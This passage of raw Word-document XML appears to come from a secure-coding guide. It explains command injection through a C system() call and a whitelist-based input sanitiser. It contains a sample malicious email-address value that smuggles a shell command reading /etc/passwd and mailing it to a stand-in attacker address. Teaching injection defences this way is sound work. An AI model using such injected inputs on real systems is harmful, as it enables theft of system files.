            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D0F26FC" w14:textId="2E1505F5" w:rsidR="00381847" w:rsidRDefault="00DA57A8">
            <w:r w:rsidRPr="00DA57A8">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46D37FD" w14:textId="77777777" w:rsidR="00F72634" w:rsidRDefault="00B43CD0" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">The example is of an application that inputs an email address into a buffer and uses a string as an argument </w:t>
            </w:r>
            <w:r w:rsidR="00D66564">
              <w:t>in a system() call. The risk occurs if the following string is entered as an email address:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70470021" w14:textId="0BE9EB32" w:rsidR="00D66564" w:rsidRDefault="00D66564" w:rsidP="0015146B">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Calibri" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>bogus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Calibri" w:hAnsi="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>@addr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Calibri" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>.com; cat /etc/passwd  | mail some</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Calibri" w:hAnsi="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>@badguy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Calibri" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="555F1178" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="01077AE9" w14:textId="77777777" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>sprintf</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(buffer, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"/bin/mail %s &lt; /tmp/email"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>, addr);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AE2AEF7" w14:textId="52E2E3EA" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>system</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(buffer);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CDCBDB8" w:rsidR="00F72634" w:rsidRDefault="00D66564" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">All valid data is accepted while dangerous data is sanitized or rejected. This is a </w:t>
            </w:r>
            <w:r w:rsidR="00AE25B5">
              <w:t>whitelisting</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> approach that defines a list of acceptable characters and removes unacceptable characters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="270FEC8A" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E023AB4" w14:textId="77777777" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>ok_chars[] = </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"abcdefghijklmnopqrstuvwxyz"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7692E05B" w14:textId="77777777" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>                         </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"ABCDEFGHIJKLMNOPQRSTUVWXYZ"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BB60282" w14:textId="77777777" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>                         </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"1234567890_-.@"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="108B3462" w14:textId="77777777" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>user_data[] = </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"Bad char 1:} Bad char 2:{"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47655085" w14:textId="77777777" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*cp = user_data; </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/* cursor into string */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14CECBA5" w14:textId="77777777" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*end = user_data + </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>strlen</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>( user_data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C673DCD" w14:textId="77777777" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(cp += </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>strspn</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(cp, ok_chars); cp != end; cp += </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>strspn</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(cp, ok_chars)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FBAB889" w14:textId="77777777" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*cp = </w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>'_'</w:t>
            </w:r>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E978D2E" w14:textId="51998B7A" w:rsidR="00D66564" w:rsidRPr="00D66564" w:rsidRDefault="00D66564" w:rsidP="00D66564">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
